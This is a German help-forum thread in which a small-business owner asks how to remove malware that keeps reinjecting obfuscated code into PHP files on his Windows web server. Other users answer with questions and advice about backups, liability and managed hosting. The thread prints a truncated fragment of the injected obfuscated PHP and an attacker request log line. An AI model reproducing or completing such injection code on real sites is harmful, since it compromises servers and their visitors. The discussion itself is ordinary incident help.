|
Trojaner befällt am Windows-Webserver PHP-Dateien Hallo, Seit einiger Zeit werden meine Websites scheinbar von einem Trojaner befallen und ich weis nicht wie ich ihn beseitigen kann. Der Trojaner modifiziert bei mir einige PHP-Dateien und vor allem die Index.php Datei. Wenn ich die seiten wieder korrigiere passiert wieder das selbe in den nächsten Tagen. Hier ein paar Beispiele: Fall 1: HTML-Code: /*7148c*/HTML-Code: ;$GLOBALS['y5097']=Array();global$y5097;$y5097=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['q7002']="\x61\x24\x65\x37\x71 usw.Code: 2017-04-24 04:23:36 POST /shopgate/ext/general17.php - 80 - 107.180.112.216 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686;+rv:24.0)+Gecko/20100101+Firefox/24.0 404 0 2 115Hat jemand Eufahrung mit so einen Trojaner. Folgendes habe ich bereits gemacht 1. PHP upgedatet 2. Alle von mir gefundenen modifizierten Dateien behoben korrigiert. |
Ich fürchte du bist hier im falschen Unterbereich. Oder läuft dein Webserver unter Windows? |
Steht doch im Threadtitel. WS 2008 R2 |
Ging aber ziemlich unter. Und einfach nur Windows im Threadtitel ist auch nicht gerade informativ. Ist das ein gewerblich genutztes System? |
Tut das was zur Sache? |
Glaubst ich frag das nur aus Spaß? Wir haben hier gewisse Regeln bzgl gewerblich genutzter Systeme. Siehe http://www.trojaner-board.de/108422-...-anfragen.html Bereinigung von gewerblich genutzten Rechnern Grundsätzlich bereinigen wir keine gewerblich genutzen Rechner. Dafür ist die IT Abteilung eurer Firma zuständig. Bei Kleinunternehmen, welche keinen eigenen IT Support haben, machen wir da eine Ausnahme und helfen gerne (kleine Spende hilft auch uns). Voraussetzung: Ihr teilt uns dies in eurer ersten Antwort mit. Bedenkt jedoch, dass Logfiles viele heikle Informationen enthalten können (Kundendaten, Bankdaten, etc.) sowie das Malware genauso wie unsere Scanner die Möglichkeit besitzt, diese auszuspähen und zu missbrauchen. Hier legen wir euch ein Formatieren und Neuaufsetzen nahe. Hier gilt insbesondere, dass wir im Nachhinein keine Logfiles löschen werden, egal wie sehr "euer Chef das auch will". |
Okay, also es laufen nur 2 Gewerblich genutzte Seiten drauf. Ein Gambioshop und eine von mir entwicklelte ISAPI dll. Sonst laufen 1-3 Joomla/Wordpress seiten drauf. Sind aber eher Privatseiten. Ja, meine Firma ist sehr klein. Ich selber bin quasi der Systemadmin aber das ist nicht mein Hauptgebiet. Alle wirklichen Systemadmins die ich kenne empfehlen mir alles auf Linux umzustellen, aber da fehlt mir leider das Wissen dazu. Meine ISAPI DLL würde darauf auch nicht laufen. Mir geht es aber eigentlich darum wo kann ich da jetzt anpacken. Zusätzliche Info zum Trojaner, er versucht über das Include immer eine Datei faviicon_xxxxx.ico anzulegen. |
Zitat:
Desktop-Systeme kann man gut bereinigen. Aber bei Webservern und dann auch noch Windows ist das was anderes. 1. Warum hast du kein Desaster-Recpvery-Konzept? Du verarbeitest und speicherst sensible Kundendaten! 2. Was genau alles kann man aus dem Internet auf diesem Rechner erreichen, sprich wie das das Teil über welche Maßnahmen abgesichert? |
Wir kommen hier scheinbar so nicht weiter! Hm... |
Wieso kannst du nicht einfach die Fragen beantworten? Dein System wurde erwischt, und? Dann muss man sich auch den Konsquenzen und Fragen stellen. |
Deine Fragen helfen mir nicht weiter, im nachhinein ist man immer schlauer. Möchtest du helfen oder nicht? Es geht doch jetzt rein darum wie man die Trojaner jetzt bekämpft. Scheinbar weist du es nicht und lenkst mich mit zum jetzigen Zeitpunkt sinnlosen Fragen ab. Sorry, aber ich verstehe deine Fragen nicht !!! Wie du oben lesen kannst, bin ich kein richtiger Systemadmin und deswegen kann ich auch logischerweise keine hoch sicherheitskonzepte präsentieren! |
Genau. Ich hab 160.000 Beiträge die nur vor lauter Unwissenheit strotzen. :lach: Wie der Webserver von außen erreichbar ist ja auch voll unwichtig. Hat ja nur was mit Sicherheit zu tun. Und Backups? Ach was, das ist eh nur was für Weicheier. :rofl: |
Da ich kein Anwalt bin ist dies keine Rechtsberatung, sondern ein Tipp meine Behauptung per Google zu prüfen: wenn du einen gekaperten Webserver (ob per Trojaner oder eine beliebige andere Sicherheitslücke) betreibst bist du zivilrechtlich für alles haftbar was der Server anstellt, gerade auch die Dinge die der Kriminelle mit deinem Server anstellt. Nur falls der Kriminelle geschnappt werden sollte kannst du versuchen ihn auf Schadenersatz zu verklagen. Ich kam darauf als ich drüber nachdachte mir einen Server zu mieten... und ließ es dann bleiben. Die logische Konsequenz wäre also dass du deinen Server vom Netz nimmst bis die Art des Einbruchs ("Trojaner" ist bei Servern eher selten) geklärt und die Sicherheitslücke geschlossen ist. Der ist och zur Zeit bestimmt noch am Netz? Wenn ja: dein Risiko, |
Ich gebe auch ja Teilweise recht, nur Theorie und Praxis ist ein wesentlicher Unterschied! Bin doch dabei den Server zu säubern, nur ist das ganze nicht so leicht, wenn die Seite Offline ist, passiert auch nichts. |
Wenn du die Dienste offline gestellt hast und die Logdateien erstmal gesichert hast dann bist du auf nem guten Pfad. Um herauszufinden wie der Einbruch geschah fürchte ich dass du einen Server Profi benötigst... |
Dachte hier befinden sich einige Profis?! |
Unsere Tools analysieren das Betriebssystem. Nicht Lücken im Webserver, Firewalls oder PHP-Scripten. Wenn du keine Ahnung hast versteh ich nicht, warum du dir so nen Klotz an Bein bindest (Serverbetreuung) - das machen Servadmins, solche die auch geraten haben einen Linux-Webserver einzurichten. Wer keine Ahnung hat sollte ja auch nicht in Bremsen vom Auto herumschrauben. |
Die meisten hier sind Amateure, einige sind IT Profis (weiß aber nicht was sie machen, wahrscheinlich Informatiker) und mindestens einer arbeitet professionell für einen AV Softwarehersteller. Das ist aber was anderes als ein professioneller Systemadministrator für Server die im Internet ständig Angriffen ausgesetzt sind. Angegriffen wird Alles: Login, alle Skripte die Usereingaben akzeptieren, SQL Datenbanken, Wordpress, Owncloud, was auch immer du installiert hast wird angegriffen. Daher musst du regelmäßig die Logs lesen, Angriffe erkennen, System aus dem Backup neu aufsetzen und Angriffsstellen schließen können. An der Stelle (und bei der Haftung) beschloss ich dass ich keinen Server benötige sondern mietete mir Webspace. Auch da kannst du nen Shop betreiben, Wordpress, Cloud etc. und musst statt den ganzen Server abzusichern nur die Logs deiner installierten Software kontrollieren. Wenn wirklich ein anderer Server von deinem Konto aus angegriffen würde würde der Betreiber deine Seiten vom Netz nehmen. D.h. mit einem Webauftritt kannst du auch mal in Urlaub gehen ohne einen Profi zu beauftragen während deiner Urlaubszeit den Server zu überwachen. Das geschrieben habe ich einige Diskussionen unter Serverbetreibern in Foren verfolgt, dort waren sie der Meinung dass Windows Server genau so sicher oder unsicher seien wie Linux Server, es hinge nur vom Betreiber ab. Da ich Linuxanwender bin würde ich wenn ich einen Server unbedingt bräuchte einen Linux Server verwenden, ähnlich dürfte es mit deinen Freunden sein, die bevorzugen Linux wahrscheinlich einfach weil sie sich da gut auskennen (abgesehen davon dass Linux wahrscheinlich wirklich ein wenig besser für Server geeignet ist als Windows, jedenfalls sind Windows Server soweit ich sehe die Minderheit im www). Danach war mir klar was für ein Klotz am Bein so ein Server ist und ich mietete für 3 Euro/Monat einen Webspace an der wahrscheinlich alles kann was du so brauchst. Jedenfalls bieten sie Wordpress Installationen, Php, Shopsysteme etc. mit an, ich weiß nur nicht ob sie mittlerweile kostenlose https Signaturen erlauben - egal, was du auch suchst, du findest mit Sicherheit einen bezahlbaren Anbieter der sich um den Webserver kümmert und deine Sorge somit auf die Websites und die Anwendungen (Wordpress, dein Shopsystem) limitiert. Wäre zu überlegen. |
| Alle Zeitangaben in WEZ +1. Es ist jetzt 10:23 Uhr. |
Copyright ©2000-2025, Trojaner-Board